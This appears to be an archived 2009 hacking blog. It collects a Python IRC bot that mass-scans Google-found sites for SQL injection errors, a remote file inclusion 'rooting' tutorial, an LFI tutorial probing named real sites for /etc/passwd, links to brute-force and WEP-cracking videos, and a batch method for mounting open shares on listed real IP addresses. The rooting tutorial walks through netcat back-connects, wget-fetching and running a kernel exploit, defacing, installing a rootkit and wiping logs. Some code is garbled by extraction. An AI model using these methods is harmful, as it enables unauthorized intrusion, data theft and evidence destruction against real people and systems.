Monday, March 9, 2009

Using SQLi Scanner Bot - sqlifinderbot.py (Video - QuickTime Required) [Source]

Download Tutorial :- http://darkc0de.com/tutorials/SQLiFinderb0t.zip


#!/usr/bin/env python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# SQLi Error Scanner /w Google Search

# darkc0decracker Crew
# www.darkc0decracker.blogspot.com

# Greetz to
# d3hydr0, P47r1ck, Tarsian, c0mr@d, reverenddigitalx, beenu, baltazar, C1c4Tr1Z, Well0ne
# and the rest of the Darkc0de members

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

import sys, socket, re, string, urllib2, sets, random, time, threading

# Command-line check. NOTE(review): the usage text stops after the script
# name; the argument placeholders were most likely lost when this listing
# was published (angle-bracketed text is missing elsewhere on the page too).
# Exactly five argv entries are required -- see the HOST/PORT/NICK/CHAN
# assignments further down.
if len(sys.argv) != 5:
print "Usage: ./sqlifinderb0t.py "
sys.exit(1)

# Browser User-Agent strings; getsites() picks one at random for each
# Google request. All of them are long-obsolete IE/Opera versions, so in a
# web server's logs they stand out as an anomaly rather than blend in.
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Opera/8.00 (Windows NT 5.1; U; en)"]

# Suggested values for Google's "hl" parameter; only listed by !langs.
langs = ["en", "it", "nl", "ru", "ua", "pl", "de", "be", "kr", "fr", "es", "se", "no", "ir", "za"]
# Module-level state shared between the IRC loop and the scanner threads.
sites=[]  # URLs scraped by getsites()
tba=[]  # "to be tested": sites minus those already listed in sqlitested.txt
threads =[]  # TestThread objects started by !test
numthreads = 1  # replaced by the raw string from !threads; int() on every use
verbose = 0  # replaced by the raw string from !verbose; int() on every use
#---------------------------------------------------------
#Edit what you want added to the address.
# Appended to every scraped URL by parse_urls(): a single quote.
EXT = "'"

#Edit what you want to search for.
# Passed to re.search() against each response body in test(); this is the
# wording of MySQL's syntax-error message.
MATCH = "error in your SQL syntax"
#---------------------------------------------------------
#---------------------------------------------------------

def getsites(lang):
# Fetch Google result pages for the module-level `query` (set by !search),
# ten results per iteration, until the start offset reaches `arg_page_end`.
# Matching URLs are appended to the module-level `sites` list; nothing is
# returned. Reads globals: query, arg_page_end, s, CHAN, agents, sites, and
# `line` (see the note below). Network failures are reported to the channel.
try:
page_counter=0
while page_counter < int(arg_page_end):
# NOTE(review): this PONG uses the module-level `line` left over from the
# IRC read loop, not anything received here -- it looks like a paste
# artifact from the PING handler at the bottom of the file.
s.send("PONG %s\r\n" % line[1])
# Fixed pause between consecutive Google requests.
time.sleep(3)
results_web = 'http://www.google.com/search?q='+str(query)+'&hl='+str(lang)+'&lr=&ie=UTF-8&start='+repr(page_counter)+'&sa=N'
request_web = urllib2.Request(results_web)
# A random User-Agent from the `agents` pool on each request.
request_web.add_header('User-Agent',random.choice(agents))
opener_web = urllib2.build_opener()
text = opener_web.open(request_web).read()
# Google's block page is detected by the literal "403 Forbidden" in the
# body; an actual 403 status would raise HTTPError and land in the
# IOError handler below instead.
if re.search("403 Forbidden", text):
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Received Captcha... Damn that sucks!"))
break
# NOTE(review): the pattern starts with a bare "+" quantifier, which re
# rejects ("nothing to repeat"), and the replace("","") calls are no-ops.
# The HTML-tag text around them was presumably stripped when this listing
# was published, so the intended expression cannot be recovered here.
names = re.findall(('+[\w\d\?\/\.\=\s\-]+=+[\d]+[\w\d\?\/\.\=\s\-]+'),text.replace("","").replace("",""))
for name in names:
# Drop Google's " - 12k - " cache-size suffix and any trailing " -".
name = re.sub(" - \d+k - ","",name.replace("","")).replace("","")
name = name.rstrip(" -")
sites.append(name)
page_counter +=10

# urllib2's URLError/HTTPError derive from IOError in Python 2, so HTTP
# level failures are reported here as well.
except IOError:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Can't connect to Google Web!"))

def parse_urls(links):
# Turn scraped result URLs into probe URLs: every link containing at least
# one "=" gets EXT appended; links without "=" are dropped. Returns the
# de-duplicated list (order is not preserved -- it passes through a set).
urls = []
for link in links:
num = link.count("=")
if num > 0:
for x in xrange(num):
# NOTE(review): str.rsplit() splits on the literal text "=+[\d]", not on
# a pattern, so unless that exact text occurs the link comes back
# unchanged and the same probe URL is appended once per "=".
link = link.rsplit(('=+[\d]'),x+1)[0]
urls.append(link+EXT)
# The `sets` module is deprecated (2.6+); the builtin set() is equivalent.
urls = list(sets.Set(urls))
return urls

def test(host):
# Fetch one probe URL and look for MATCH in the response body. A hit is
# announced to the channel and appended to foundsqli.txt; a miss is only
# announced when verbose is on. Reads globals: verbose, s, CHAN, MATCH.
# Returns None.
# Process-wide side effect: every call resets the socket default timeout.
socket.setdefaulttimeout(5)
if int(verbose) == 1:
# NOTE(review): host is scraped web content interpolated raw into an IRC
# protocol line; TestThread.run() strips "\n" but not "\r" before calling.
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Testing:", host))
try:
if host[:7] != "http://":
host = "http://"+host
source = urllib2.urlopen(host).read()
# MATCH is used as a regular expression, not a literal substring.
if re.search(MATCH, source):
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[!] Found:", host))
# `file` shadows the builtin; the handle is not closed if write() raises.
file = open("foundsqli.txt", "a")
file.write("\n[!] Found: "+host)
file.close()
else:
if int(verbose) == 1:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[-] Not Vuln:", host))
# Python 2 "except ..., name" syntax. urllib2's URLError/HTTPError are not
# socket.error, so HTTP error responses fall through to the bare except.
except(socket.gaierror, socket.timeout, socket.error), msg:
s.send("PRIVMSG %s :%s%s @ %s\r\n" % (CHAN, "[-] Error: ",msg, host))
# Bare except: everything else -- HTTP errors, the file write, even
# KeyboardInterrupt -- is dropped without a trace.
except:
pass

class TestThread(threading.Thread):
# Worker that probes one slice of the `tba` list. Started by !test in the
# main loop; several may run at once, and all of them append to the same
# log file with no lock.
def __init__(self,hosts):
# hosts: the slice of scraped URLs to test (raw, before parse_urls()).
self.hosts=hosts
# 0 while running, 1 once run() has finished; !status sums these.
self.fcount = 0
threading.Thread.__init__(self)

def run (self):
urls = parse_urls(self.hosts)
for url in urls:
try:
# Only "\n" is stripped here; a "\r" would survive into test().
test(url.replace("\n",""))
except(KeyboardInterrupt):
pass
# Every raw host in the slice is recorded as tested, whether or not
# parse_urls() kept it. `file` shadows the builtin; no try/finally.
file = open("sqlitested.txt", "a")
for tbw in self.hosts:
file.write(tbw+"\n")
file.close()
self.fcount+=1

# IRC bot main loop. Connection parameters come from argv; PASS is the
# channel key sent with JOIN.
PASS = ""
HOST = sys.argv[1]
PORT = int(sys.argv[2])
NICK = sys.argv[3]
CHAN = sys.argv[4]
# NOTE(review): unreachable -- the argv check at the top of the file exits
# unless len(sys.argv) == 5, so PASS is always empty.
if len(sys.argv) == 6:
PASS = sys.argv[5]
readbuffer = ""
# Plain TCP to the IRC server (no TLS); NICK/USER/JOIN are sent without
# waiting for any server reply.
s=socket.socket( )
s.connect((HOST, PORT))
s.send("NICK %s\r\n" % NICK)
s.send("USER %s %s bla :%s\r\n" % (NICK, NICK, NICK))
s.send("JOIN :%s %s\r\n" % (CHAN, PASS))

# Read loop: the buffer is split on "\n" and the trailing partial line is
# kept for the next recv().
while 1:
readbuffer=readbuffer+s.recv(1024)
temp=string.split(readbuffer, "\n")
readbuffer=temp.pop( )
# Each complete line is split on whitespace. For a channel message the
# shape is ":nick!user@host PRIVMSG #chan :!cmd args", so line[3] is the
# command word and line[4:] its arguments; a server ping is "PING :srv".
for line in temp:
line=string.rstrip(line)
line=string.split(line)
# Every handler reads by index; an IndexError from a short line is
# swallowed by the except at the end of this block. Any other exception
# (int() on a non-numeric !threads/!verbose argument, IOError opening
# sqlitested.txt) propagates and ends the bot.
try:
# NOTE(review): no check on who sent a command -- any user in the channel
# can drive every handler below, including !die.
if line[1] == "JOIN":
name = str(line[0].split("!")[0])
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "Welcome, ", name.replace(":","")))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|----------------------------|"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| rsauron[at]gmail[dot]com v1.0"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| 8/2008 SQLi Finder Bot"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Scans Sites for SQLi errors"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Retreives Targets from Google"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Stores logs of Found and Tested"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Multi-Threading Scanning! - WOW"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| type !help - for help "))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|----------------------------|"))
if line[3] == ":!help":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Displaying list of commands the bot understands"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !status - Shows status of b0t!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !clear - Clears the hosts in the testing array!!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !search - Gets sites to test! ex. !search "))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !show - Show list of sites to be tested!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !test - Preform Test on sites in testing array!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !langs - Shows a list a of langs that can be used for search function!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !threads - Set the number of threads to be used in testing.. default is 1!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !verbose - Verbosity ON = 1 - Verbosity OFF = 0 - Default is OFF"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !die - Kills b0t!"))
if line[3] == ":!langs":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] These are just some langs you could use...!"))
for lang in langs:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] ",lang))
# sys.exit() in the main thread only; TestThreads are non-daemon by
# default, so the process lingers until any running scan finishes.
if line[3] == ":!die":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] b0t dying... vist darkc0de.com!!"))
sys.exit(1)
# !search <query> <lang> <end offset>: the three words become the globals
# that getsites() reads; a missing word is an IndexError, swallowed below.
if line[3] == ":!search":
query = line[4]
lang = line[5]
arg_page_end = line[6]
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Query: ", query))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Language: ", lang))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Search ends: ", arg_page_end))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Starting search..."))
getsites(lang)
sites = list(sets.Set(sites))
# sqlitested.txt must already exist: open(..., "r") raises IOError
# otherwise, and nothing here catches it.
testedfile = open("sqlitested.txt", "r")
testedsites = testedfile.read()
testedfile.close()
if testedsites.endswith("\n"):
testedsites = testedsites.rstrip("\n")
testedsites = testedsites.split("\n")
# tba = scraped sites minus those already recorded as tested.
s1 = set(sites)
s2 = set(testedsites)
tba = list(s1.difference(s2))
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Found ", len(tba), " sites to test!"))
if line[3] == ":!clear":
tba=[]
sites=[]
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Testing array cleared..."))
if line[3] == ":!status":
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of sites loaded in testing array: ", len(tba)))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads set for scanning: ", numthreads))
# Each TestThread sets fcount to 1 when its run() completes.
masterthread = 0
if threads != []:
for thread in threads:
masterthread+=thread.fcount
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads finished scanning: ", masterthread))
if int(verbose) == 1:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set ON!"))
if int(verbose) == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set OFF!"))

if line[3] == ":!show":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Showing sites to be tested..."))
if len(tba) < 50:
for site in tba:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] ", site))
else:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] More then 50 sites in list... Just to many hosts to print to term! sry!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Done!"))
# numthreads and verbose stay strings; every use wraps them in int(), and
# a non-numeric value raises ValueError, which is not caught.
if line[3] == ":!threads":
numthreads = line[4]
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads set for testing: ", numthreads))
if line[3] == ":!verbose":
verbose = line[4]
if int(verbose) == 1:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set ON!"))
if int(verbose) == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set OFF!"))
if line[3] == ":!test":
# NOTE(review): `tba == 0` compares a list with an int and is always
# False, so an empty list also takes the else branch.
if tba == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] No sites to test..."))
else:
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Beginning test of ", len(tba), " sites!"))
threads=[]
# Python 2 integer division: numthreads equal-sized slices. NOTE(review):
# (x-1) == int(numthreads) never holds for x in range(numthreads), so the
# leftover len(tba) % numthreads entries are not handed to any thread.
i = len(tba) / int(numthreads)
for x in range(0, int(numthreads)):
if (x-1) == int(numthreads):
sliced = tba[x*i:]
else:
sliced = tba[x*i:(x+1)*i]
thread = TestThread(sliced)
thread.start()
threads.append(thread)

except(IndexError):
pass

# Outside the try: an empty line (line == []) raises IndexError here.
if(line[0]=="PING"):
s.send("PONG %s\r\n" % line[1])

Sunday, March 8, 2009

R.F.I. Rooting Tutorial

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

The aim of this tutorial is to give a very general picture of the rooting process
on a Linux server with Safe Mode: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we will continue to the rooting process.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root privileges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can proceed to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

*

Local File Inclusion Tutorial - Written by d3hydr0

Local File Inclusion Tutorial - Written by d3hydr0
[- How to Find LFI Vulnerability -]

How to Find LFI Vulnerability, Well i use me of adding ..
Example

www.site.com/index.php?p=..





Real World Examples:

http://www.jedit.org/index.php?page=..




Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line
63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.
php on line 63




This is not Vulnerable,
A Vulnerable should look like

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /
home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62




include is the code , the script is using for example



$page = $_GET[page];
include($page);
?>




Should be [function.include]
but


$page = $_GET[page];
require_once($page);
?>




should be [function.require_once] or [function.require]

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..




Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'
) in /indexm.php on line 164




[b][function.require][/b]




So we know it Vulnerable

if Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php





other try
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get Something.

Tutorial on How To Hide Files in JPEG Images.

Tutorial on How To Hide Files in JPEG Images.

Written Tutorial:
In this example we will hide a text message inside a picture. We have chosen for this tutorial a text file named Secret.txt and a picture firefox.jpg.

1. Move your files you want to combine in a new folder, in our case C:\Hidden.

2. Add the file you want to hide into a new RAR archive (in our example named Secret.txt.rar).

3. WinRar created the archive in the folder where our files are located.

4. Open Command Prompt (Start -> Run..., type cmd and press Enter).

5. Go to the folder where your files are located, in this case C:\Hidden by using the cmd command.

6. Now type copy /b firefox.jpg + secret.txt.rar helpero.jpg where firefox.jpg is the original picture, secret.txt.rar is the file that will be hidden, and helpero.jpg is the file which contains both.

7. If you open helpero.jpg you will see the firefox.jpg image.

8. Try opening the file with WinRar (select All files).


9. Now you can see the text file that is hidden in the picture.

Installing Nessus in Ubuntu

Open a terminal window and type in:
sudo apt-get install nessus
sudo apt-get install nessusd
sudo nessus-adduser
sudo ln -fs /etc/init.d/nessusd /etc/rc2.d/S20nessusd
sudo /etc/init.d/nessusd start
sudo gedit /usr/share/applications/Nessus.desktop

Insert the following lines into the new file

[Desktop Entry]
Name=Nessus
Comment=Nessus
Exec=nessus
Icon=/usr/share/pixmaps/nessus.xpm
Terminal=false
Type=Application
Categories=Application;System;

After that you can find Nessus in the Gnome menu under Applications -> System Tools.

Installing Ophcrack in Ubuntu

http://www.darkc0de.com/tutorials/ophcrack_install.html

Gmail BruteForce with gmailpopbrute.py (Video)

http://www.darkc0de.com/tutorials/gmailbrute.avi

MySQL Injection DataExt & Fuzzer

http://www.darkc0de.com/tutorials/schemafuzz-vid.zip

Airplay replay attack w/ no wireless client (Video)

http://www.darkc0de.com/tutorials/Airplay_replay_attack_-_no_wireless_client_required.rar

128 bit WEP cracking w/ injection (video)

http://www.darkc0de.com/tutorials/128_Bit_Wep_Cracking_With_Injection_.rar

Testing SQL injection with with darkcode tools.(Video)

http://www.darkc0de.com/tutorials/sql_darkc0de.zip

Spoofing Useragents with firefox (Video Tutorial)

http://www.darkc0de.com/tutorials/user-agent.zip

List of: UserAgents.txt

Linux Rooting Video

http://www.darkc0de.com/tutorials/Linux_Rooting.rar

3 baltazar SQL Hack videos: [ Video 1 ] [ Video 2 ] [ Video 3 ]

video1 :- http://www.darkc0de.com/tutorials/izlasci.rar



video2 :- http://www.darkc0de.com/tutorials/jafra.rar



video3 :- http://www.darkc0de.com/tutorials/sdm.rar

SQL Hack Video 2

http://www.darkc0de.com/tutorials/sqlshow1.avi.zip

Saturday, March 7, 2009

SQL Hack Video

http://www.darkc0de.com/tutorials/sqlshow.avi.zip

Video Tutorial ( PHP ATM ADMIN HASH )

http://www.darkc0de.com/tutorials/PHP-ATM-Admin-Hash.rar

Video Tutorial ( PHP-ATM . Get Shell )

http://www.darkc0de.com/tutorials/php-atm.rar

Video Tutorial ( NC-How to Blind Shell in linux)

http://www.darkc0de.com/tutorials/nc-bind-port-in-linux.rar

Video Tutorial ( NC-How to get Connect Back)

http://www.darkc0de.com/tutorials/nc_Connect-Back.rar

Robots.txt harmless? Or dangerous?

Robots.txt harmless? Or dangerous?
By d3hydro

So alright... what is this strange file in the root of your directories you question?

Let me break down what it basically is... all it basically is, is a rule set for search engines.

Example of a robot.txt file.

# This is my robots.txt file!
User-agent: *
Disallow: /idontwantthisindexedbysearchengines/

Now let me explain what it is line by line.

# This is a User agent... example Firefox or Konqueror, * is anything.
User-agent: *

# This is a rule for search engines not to index this folder.
Disallow: /idontwantthisindexedbysearchengines/

Now lets talk about why robots.txt can be dangerous.

All websites out there that are using the Robots file most likely have it exposed.

Here take this - http://k0h.org/robots.txt

Well, you're probably asking what do I do now? Instead of using root folders of your "private" things, make a new folder named something like 021873257923 then store the other folder in there. Note... never ever store very important things on your Webserver, even if it's protected by robots.txt.

Now lets build our own robots.txt file.

# This is a comment... these are ignored.
User-agent: *
Disallow: /273432087423374242/

User-agent: Googlebot-Image
Disallow: /images

# Alexa's bot is a bit aggressive so I think I shall make it wait 1 minute (60 seconds) until it can view another page.
User-agent: IA_Archiver
Crawl-Delay: 60

Questions!

Ok... see I have over 300 folders staring with admin... none should be indexed... what do I do? Is there some sort of wildcard I can use?

Simply Disallow: /admin without the ending /.

Are there engines that do not obey robots.txt?

Yep.

My host disallows Robots.txt...

They probably don't... you just have not tried selecting view hidden files in your FTP client. Look into other methods... google is your friend.

On a side note. I have not written this in the official tutorial, but a lot of people asked me why make a directory 349823423423 for instance and the answer is because it is harder for script kiddies to do a directory name brute force on your site and find out your private directories' names.

Cut No paste, Angry IP Stripper...

Angry IP Stripper...

I hate cut n pasting IP's from Angry IP to my command prompt or from my Export of scanned IP's from Angry to cmd.
I looked at ways to speed up the process of doing the following command "net view \\" without the need to go back and forth from one window to another 50 times to find a small list of IP's with open shares.

I asked around on a few different Forums and someone gave me the key to make one command to strip Angry's export and output the IP's into CMD with the command net view \\ and do the crap work for me.

So now I can type one command or cut n paste one command to do 50 or whatever searches for open shares.

Here it is...

for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat

Ok let me explain a few things.

When Angry has finished scanning a range, I export the results to a .txt file, I might name it 1.txt or 2.txt.

Inside the txt file it looks like this
-------------------------------
This file was generated by Angry IP Scanner
Visit http://www.angryziber.com/ for the latest version


Scanned 217.81.105.1 - 217.81.255.255 (Ports: 5110,139,12345,23,445)
24/03/2008 11:59:28 PM

IP Ping Hostname Comp. Name Group Name User Name MAC Address TTL Open Ports

217.81.122.148 92 ms pD9517A94.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.128.1 994 ms pD9518001.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.136.236 327 ms pD95188EC.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.143.82 1806 ms pD9518F52.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.190.34 733 ms pD951BE22.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.209.185 651 ms N/A N/A N/A N/A N/A N/A 23
217.81.230.253 290 ms pD951E6FD.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.235.126 417 ms pD951EB7E.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.246.211 198 ms N/A N/A N/A N/A N/A N/A 23
217.81.248.34 387 ms pD951F822.dip.t-dialin.netCONNIPET N/A CONNIPET N/A N/A 139
217.81.250.37 331 ms pD951FA25.dip.t-dialin.netN/A N/A N/A N/A N/A 23
217.81.251.202 101 ms pD951FBCA.dip.t-dialin.netHOME-PC ARBEITSGRUPPE N/A N/A 50 139
217.81.255.60 128 ms pD951FF3C.dip.t-dialin.netN/A N/A N/A N/A N/A 139,445
-------------------------

I don't have to get Angry to save all this info, I just like looking at the different names to get a feel of what a system might have on it.

That export is saved to c:\ for example, I run cmd.exe, goto c:\, type dir and there it is.

I paste in the for command, for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat


I double check it's going to look in the correct txt file and also pick a name for the bat file, (auto, 1, run) it doesn't matter what the .bat is called, once I check and see the info is correct I hit enter...

Then type the name of the .bat file and its running by itself..

--------------------------
Ctrl-Break, to stop the batch file running. Hit 3 or 4 times and wait 10 seconds..

So for me it looks like this
-
C:\>for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1
.bat

C:\>1
C:\>net view \\217.81.122.148
System error 53 has occurred. <---(Most likely firewall)
The network path was not found.
C:\>net view \\217.81.128.1

-

The other thing I do is increase the command prompt height buffer so that all the information scrolling along doesn't get lost, right click command prompt, select properties, layout, increase screen buffer size Height to 1000 or more depending on how many IPs you need to check.

Sit back and wait for it to go through the list, 50 is a good number. Once it's done, right click the screen, mark it all, right click it again and save it in notepad and check what you have to open up..
-
net view \\89.214.144.144
Shared resources at \\89.214.144.144
Sandra
Share name Type Used as Comment
-------------------------------------------------------------
C Disk
Enviar Para o OneNote 2007 Print Enviar Para o OneNote 2007
Fact2007 Disk
HP Photosmart 7400 Series Print HP Photosmart 7400 Series
I Disk
Public Disk
Users Disk
The command completed successfully.
-

(One scan brought up this list of drives on a share.)

c:\net use k: \\89.214.144.144\C
c:\The command completed successfully.
c:\net use L: \\89.214.144.144\Fact2007
c:\The command completed successfully
c:\net use M: \\89.214.144.144\I
c:\The command completed successfully

Now in my computer under network drives, I have 3 new shares to look at.

c on '89.214.144.144'
Fact2007 on '89.214.144.144'
I on '89.214.144.144'


Once you're done browsing don't forget to right click on these and disconnect, otherwise your system will run really slow.

Also each time you run the for command and you don't change the name of your .bat file, new information is added to it instead of it being overwritten.
Why this is, I'm not sure; it just means the list will grow and it will take longer and longer to run a scan, so del *.bat before you run a new Stripper.

c:\edit *.bat, Select shift-Arrow Down to select a portion to delete is another option.
Edit also lets to look at what the bat looks like. The start of the bat has a little junk in it it while its running.

---
C:\>1
C:\>net view \\This
System error 53 has occurred.
The network path was not found.
